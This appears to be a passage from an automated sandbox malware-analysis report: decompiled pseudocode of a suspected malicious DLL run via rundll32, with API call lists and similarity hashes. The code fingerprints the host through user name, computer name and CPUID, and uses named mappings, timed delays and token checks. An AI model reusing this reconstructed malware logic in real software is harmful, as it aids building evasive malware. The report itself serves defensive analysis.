					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x79a2c4; // 0x2f0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x79a2a4 = 5;
						} else {
							_t69 = E00791AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x79a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00795F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00793032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x79a29c);
							goto L21;
						} else {
							__eflags =  *0x79a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00791492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x79a2a0);
								L21:
								L00797D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x79a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00792022
0x00792034
0x00792037
0x00792043
0x0079204b
0x0079204e
0x007921b4
0x00792054
0x00792054
0x00792056
0x0079205b
0x0079205c
0x00792062
0x00792065
0x00792068
0x00792076
0x00792081
0x00792084
0x00792086
0x00792093
0x0079209d
0x007920a1
0x007920a4
0x007920a9
0x007920b4
0x007920b4
0x007920ab
0x007920ab
0x007920b2
0x00000000
0x00000000
0x007920b2
0x007920be
0x00000000
0x007920c1
0x007920c5
0x007920d0
0x007920d0
0x007920d7
0x007920dc
0x007920e3
0x007920ec
0x007920f2
0x007920f5
0x007920fc
0x007920ff
0x00000000
0x00000000
0x00792101
0x00792104
0x00792107
0x0079210a
0x00000000
0x0079210c
0x0079211b
0x0079211b
0x00000000
0x00792149
0x00792149
0x0079214e
0x0079216d
0x0079216f
0x00792174
0x00792175
0x00000000
0x00792150
0x00792150
0x00792156
0x00000000
0x00792158
0x00792158
0x0079215d
0x0079215f
0x00792164
0x00792165
0x0079217b
0x0079217b
0x00792183
0x0079218e
0x00792191
0x0079219c
0x0079219e
0x007921a0
0x007921a3
0x00000000
0x007921a9
0x00000000
0x007921a9
0x007921a3
0x00792156
0x00000000
0x0079214e
0x0079211e
0x00792120
0x00792123
0x00792124
0x00792124
0x00792128
0x00792132
0x00792132
0x00792138
0x0079213b
0x0079213b
0x00792141
0x00792141
0x007921be
0x00000000

APIs

memset.NTDLL ref: 00792037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00792043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00792068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00792084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0079209D
HeapFree.KERNEL32(00000000,00000000), ref: 00792132
CloseHandle.KERNEL32(?), ref: 00792141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0079217B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0079560C), ref: 00792191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0079219C

Part of subcall function 00791AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05019308,00000000,?,73BCF710,00000000,73BCF730), ref: 00791B07
Part of subcall function 00791AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05019340,?,00000000,30314549,00000014,004F0053,050192FC), ref: 00791BA4
Part of subcall function 00791AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007920B0), ref: 00791BB6

GetLastError.KERNEL32 ref: 007921AE

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 667a8a51635cf936bb945521b53e029ec6090fe94cf0edf0788f2e324b3c92e1
Instruction ID: 5ea1b145f7312ddfd0e451947966f326cb2e311501e4d765bf4c550e410dc181
Opcode Fuzzy Hash: 667a8a51635cf936bb945521b53e029ec6090fe94cf0edf0788f2e324b3c92e1
Instruction Fuzzy Hash: CD515A71901229FEDF10EF98EC44DEEBFB8EF49320F208116F514A2191D7798A41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 007953F2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E007953F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E007958F8();
				if(_t27 != 0) {
					_t77 =  *0x79a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x79a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x79a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0079696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x79a2d4; // 0x487d5a8
					_push(0x79a2fc);
					_push(1);
					_t7 = _t32 + 0x79b5ad; // 0x4d283a53
					 *0x79a2f8 = 0xc;
					 *0x79a300 = 0;
					L00794AF8();
					_t36 = E00796384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00794454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00796837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x79a2d4; // 0x487d5a8
								_t18 = _t64 + 0x79b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x79a32c = _t87;
						}
						_t38 = E007960E1();
						 *0x79a2c8 =  *0x79a2c8 ^ 0xe8fa7dd7;
						 *0x79a31c = _t38;
						_t39 = E00796837(0x60);
						__eflags = _t39;
						 *0x79a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x79a37c; // 0x5019630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x79a37c; // 0x5019630
							 *_t56 = 0x79b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x79a290, _t84, 0x43);
							__eflags = _t42;
							 *0x79a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x79a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x79a2d4; // 0x487d5a8
								_t19 = _t76 + 0x79b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x7992a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00794454( ~_v8 &  *0x79a2c8, 0x79a00c); // executed
								_t84 = E00792206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00791376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00792022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00792439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x79a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00796BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x007953f2
0x007953fd
0x00795400
0x00795403
0x00795406
0x0079540d
0x0079540f
0x0079541b
0x0079541d
0x0079541d
0x00795426
0x0079542e
0x00795431
0x0079544b
0x00795450
0x00795451
0x00795453
0x00795458
0x0079545d
0x0079545f
0x00795466
0x00795470
0x00795476
0x00795483
0x0079548a
0x0079548f
0x0079548f
0x00795498
0x007954c1
0x007954c4
0x007954d1
0x007954d8
0x007954e4
0x007954e6
0x007954e8
0x007954ed
0x007954f3
0x007954f9
0x007954ff
0x00795502
0x00795507
0x0079550f
0x00795511
0x00795511
0x00795514
0x00795514
0x0079551a
0x0079551f
0x00795527
0x0079552c
0x00795531
0x00795533
0x00795538
0x00795567
0x0079553a
0x0079553f
0x00795544
0x00795549
0x00795550
0x00795556
0x0079555b
0x00795561
0x00795561
0x00795568
0x0079556a
0x00795579
0x0079557f
0x00795581
0x00795586
0x007955b2
0x00795588
0x00795588
0x0079558e
0x0079559b
0x007955a1
0x007955a1
0x007955a9
0x007955ab
0x007955b3
0x007955b5
0x007955bc
0x007955c9
0x007955d3
0x007955d5
0x007955d7
0x00000000
0x00000000
0x007955d9
0x007955de
0x007955e0
0x007955e7
0x007955eb
0x007955ee
0x00795603
0x00795607
0x0079560c
0x00000000
0x0079560c
0x007955f0
0x007955f2
0x00000000
0x00000000
0x007955f4
0x007955fd
0x007955ff
0x00795601
0x00000000
0x00000000
0x00000000
0x00795601
0x007955e4
0x007955e4
0x007955b5
0x0079549a
0x0079549a
0x0079549f
0x0079560e
0x00795612
0x0079561a
0x0079561a
0x00000000
0x00795612
0x007954a5
0x007954a8
0x007954a8
0x007954aa
0x007954ad
0x007954b5
0x007954bc
0x00000000
0x00795622
0x00795622
0x00795625
0x0079562a
0x0079562a

APIs

Part of subcall function 007958F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0079540B,00000000,00000000,00000000,?,?,?,?,?,00796BD8,?,00000001), ref: 00795907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0079A2FC,00000000), ref: 00795476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00796BD8,?,00000001), ref: 0079548F
wsprintfA.USER32 ref: 0079550F
memset.NTDLL ref: 0079553F
RtlInitializeCriticalSection.NTDLL(050195F0), ref: 00795550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 00795579
wsprintfA.USER32 ref: 007955A9

Part of subcall function 00794454: GetUserNameW.ADVAPI32(00000000,007955CE), ref: 0079448B
Part of subcall function 00794454: RtlAllocateHeap.NTDLL(00000000,007955CE), ref: 007944A2
Part of subcall function 00794454: GetUserNameW.ADVAPI32(00000000,007955CE), ref: 007944AF
Part of subcall function 00794454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,007955CE,?,?,?,?,?,00796BD8,?,00000001), ref: 007944D0
Part of subcall function 00794454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 007944F7
Part of subcall function 00794454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0079450B
Part of subcall function 00794454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00794518
Part of subcall function 00794454: HeapFree.KERNEL32(00000000,00000000), ref: 00794536

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

Strings

!}y, xrefs: 0079561A

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID: !}y
API String ID: 2910951584-1971731430
Opcode ID: 3926b3073f9a5059cb000aa638e90f0c3dab715c613faba8fbf30b918898f251
Instruction ID: 10dcdc1ad59acf248e97669857e8c421d98ef4a9864efe9b0ee44a10fb1fbf6e
Opcode Fuzzy Hash: 3926b3073f9a5059cb000aa638e90f0c3dab715c613faba8fbf30b918898f251
Instruction Fuzzy Hash: C351F171901625EBDF22DB68FC49FAE73F9AB44700F114116E804E7261DB7CDD428BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00796B0F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00796B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x79a290 = _t14;
				if(_t14 != 0) {
					 *0x79a180 = GetTickCount();
					_t16 = E00794C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00797EEA();
						_t40 = _t18 + _t20;
						_t22 = E0079414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x79a2ac; // 0x2f4
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x79a2b8 = 1; // executed
						}
					}
					_t16 = E007953F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00796b0f
0x00796b24
0x00796b2c
0x00796b31
0x00796b44
0x00796b49
0x00796b50
0x00796bd8
0x00796bde
0x00000000
0x00000000
0x00000000
0x00796b56
0x00796b56
0x00796b5b
0x00796b61
0x00796b67
0x00796b71
0x00796b75
0x00796b76
0x00796b7b
0x00796b7c
0x00796b7d
0x00796b82
0x00796b88
0x00796b91
0x00796b97
0x00796b9d
0x00796ba2
0x00796ba9
0x00796bad
0x00796bb5
0x00796bbd
0x00796bbf
0x00796bbf
0x00796bc7
0x00796bc9
0x00796bc9
0x00796bc7
0x00796bd3
0x00000000
0x00796bd3
0x00796b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00796B24
GetTickCount.KERNEL32 ref: 00796B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00796B5B
SwitchToThread.KERNEL32(?,00000001), ref: 00796B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00796B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00796B97
IsWow64Process.KERNEL32(000002F4,?,?,00000001), ref: 00796BB5

Strings

4>, xrefs: 00796B44

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: 4>
API String ID: 3690864001-1117244486
Opcode ID: 26c696d7da9adf7af8fa742c501b0459eac0c3bf9049906afd70d35060edad61
Instruction ID: a75c609f8839cdda651aeede9805d45016b122d1c84bb30a786519ade4b2acbe
Opcode Fuzzy Hash: 26c696d7da9adf7af8fa742c501b0459eac0c3bf9049906afd70d35060edad61
Instruction Fuzzy Hash: C821D5F1A04214AFEB109F6CEC99A6A77A8FB44350F108A2EF615C6150F77D8C058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D482553, Relevance: 13.6, APIs: 9, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invoke_watson.LIBCMT ref: 6D48258C
__copytlocinfo_nolock.LIBCMT ref: 6D482604
__wsetlocale_nolock.LIBCMT ref: 6D48261B
_wcscmp.LIBCMT ref: 6D48263E
__updatetlocinfoEx_nolock.LIBCMT ref: 6D482667
___removelocaleref.LIBCMT ref: 6D48266D
__updatetlocinfoEx_nolock.LIBCMT ref: 6D48268C

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: Ex_nolock__updatetlocinfo$___removelocaleref__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2830849289-0
Opcode ID: 6df71071d47e25feed1a8271b092f918a191531c5b3ecf3e693732a1ea2e0df5
Instruction ID: ed569045430aa526cc771a9ac2dc7374abe485269fc78e03a2a76c761b2abe17
Opcode Fuzzy Hash: 6df71071d47e25feed1a8271b092f918a191531c5b3ecf3e693732a1ea2e0df5
Instruction Fuzzy Hash: EF41E232909306AFDB20DFA4D880FAD37F0AB04358F21402EEA15A6282DF76DD41DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00796384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00796384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00797D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x79a2d4; // 0x487d5a8
				_t5 = _t13 + 0x79b8a2; // 0x5018e4a
				_t6 = _t13 + 0x79b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00797A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x79a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00796384
0x0079638c
0x00796390
0x00796396
0x0079639b
0x007963a0
0x007963a3
0x007963a6
0x007963ab
0x007963ac
0x007963af
0x007963b4
0x007963bb
0x007963c5
0x007963c7
0x007963c8
0x007963cb
0x007963e7
0x007963ed
0x007963f1
0x0079643f
0x007963f3
0x00796400
0x00796410
0x00796418
0x0079642a
0x0079642e
0x00000000
0x00000000
0x0079641a
0x0079641d
0x00796422
0x00796424
0x00796424
0x00796402
0x00796404
0x00796430
0x00796431
0x00796431
0x00796400
0x00796446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00795488,?,00000001,?), ref: 00796390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 007963A6
_snwprintf.NTDLL ref: 007963CB
CreateFileMappingW.KERNELBASE(000000FF,0079A2F8,00000004,00000000,00001000,?), ref: 007963E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00795488,?), ref: 007963F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00796410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00795488), ref: 00796431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00795488,?), ref: 00796439

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: d45ca5553cb04ec247655e70426f0207acf40ba89c8df2350a6c211ff4d802e6
Instruction ID: 9e85d5e675ba7f87c209ce14541f78594f425ed315c1c638b7635fd46f5a4f22
Opcode Fuzzy Hash: d45ca5553cb04ec247655e70426f0207acf40ba89c8df2350a6c211ff4d802e6
Instruction Fuzzy Hash: 0D210572600214FBDB109BACEC06F9D77B9AB44750F208226FA15E71A0DB789A01CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00794454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00794454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x79a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0079143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x79a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x79a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0079283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x79a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x79a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0079283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x79a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00794454
0x0079445c
0x00794462
0x00794465
0x00794468
0x0079446a
0x0079446f
0x0079446f
0x00794475
0x00794477
0x00794484
0x007944e5
0x00794486
0x0079448b
0x00794491
0x00794496
0x007944a4
0x007944a8
0x007944b7
0x007944be
0x007944c5
0x007944c5
0x007944d0
0x007944d0
0x007944a8
0x00794496
0x007944e7
0x007944ed
0x007944f7
0x007944f9
0x007944fe
0x0079450d
0x00794511
0x0079451c
0x00794523
0x0079452a
0x0079452a
0x00794536
0x00794536
0x00794511
0x0079453f
0x00794541
0x00794544
0x00794546
0x00794549
0x0079454c
0x00794556
0x0079455a
0x0079455e

APIs

GetUserNameW.ADVAPI32(00000000,007955CE), ref: 0079448B
RtlAllocateHeap.NTDLL(00000000,007955CE), ref: 007944A2
GetUserNameW.ADVAPI32(00000000,007955CE), ref: 007944AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,007955CE,?,?,?,?,?,00796BD8,?,00000001), ref: 007944D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 007944F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0079450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00794518
HeapFree.KERNEL32(00000000,00000000), ref: 00794536

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 1de554e93f0d85bd27476c0827ad29ee30b75b3b7cf00639da640dcc811c892a
Instruction ID: 113a12771c035b53517b7fec7c64a37c11c8f05855c57373912b611feaac41fb
Opcode Fuzzy Hash: 1de554e93f0d85bd27476c0827ad29ee30b75b3b7cf00639da640dcc811c892a
Instruction Fuzzy Hash: 8F311872600209EFDB11DFA9ED81F6EB7F9BB88300B11802AE505D3220E7399E129B55

Uniqueness

Uniqueness Score: -1.00%

Function 0079113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0079113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x79a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00796837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E007950CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0079114a
0x00791151
0x00791158
